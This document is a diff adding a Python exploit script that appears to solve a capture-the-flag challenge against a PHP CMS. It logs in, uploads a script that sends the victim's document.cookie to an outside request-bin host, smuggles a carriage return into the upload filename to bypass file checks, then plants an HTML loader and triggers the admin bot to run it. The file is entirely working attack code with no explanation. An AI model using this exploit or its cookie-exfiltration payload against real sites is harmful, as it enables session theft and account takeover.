l0vey0u · September 3, 2023 13:55 · Sep 3, 2023
diff --git a/wacon_cms.py b/wacon_cms.py
@@ -0,0 +1,81 @@
+import requests
+
+HOST = "https://9307-211-114-95-154.ngrok-free.app"
+HOST = "http://58.225.56.195"
+
+req_bin = "https://jsngigx.request.dreamhack.games"
+ex_src = f"location.replace('{req_bin}/?a='+document.cookie);"
+
+idx = int(input("마지막 글의 idx를 알려주세요"))
+
+with open("ex.html", "w") as f:
+    f.write(ex_src)
+
+sess = requests.Session()
+
+data = {
+    "username": "ghost",
+    "pw": "ghost123"
+}
+resp = sess.post(f"{HOST}/login.php", data=data)
+print(sess.cookies.get_dict())
+print(resp.text)
+
+data = {
+    'title': 'yey',
+    'content': 'yey',
+    'level': 1,
+    'password': 'qwe123qwe'
+}
+headers = {
+    "Cookie": f"PHPSESSID={sess.cookies.get_dict()['PHPSESSID']}"
+}
+files = {'file':('ex.html@', open('ex.html', 'rb'))}
+req = requests.Request('POST', f"{HOST}/board.php?p=write", data=data, files=files, headers=headers)
+req = req.prepare()
+req.body = req.body.replace(b"@", b"\r")
+print(req.body)
+print(req.headers)
+resp = sess.send(req)
+
+print(resp.content)
+
+
+
+load_src = f"""
+<html>
+<head>
+</head>
+<body>
+	<script src="http://webserver/download.php?idx={idx+1}"></script>
+</body>
+</html>
+"""
+with open("load.html", "w") as f:
+    f.write(load_src)
+
+data = {
+    'title': 'yey',
+    'content': 'yey',
+    'level': 1,
+    'password': 'qwe123qwe'
+}
+headers = {
+    "Cookie": f"PHPSESSID={sess.cookies.get_dict()['PHPSESSID']}"
+}
+files = {'file':('load.html@', open('load.html', 'rb'))}
+req = requests.Request('POST', f"{HOST}/board.php?p=write", data=data, files=files, headers=headers)
+req = req.prepare()
+req.body = req.body.replace(b"@", b"\r")
+print(req.body)
+print(req.headers)
+resp = sess.send(req)
+
+print(resp.content)
+
+params = {
+    "idx": idx + 2,
+    "path": f"download.php"
+}
+resp = sess.get(f"{HOST}/report.php", params=params)
+print(resp.text)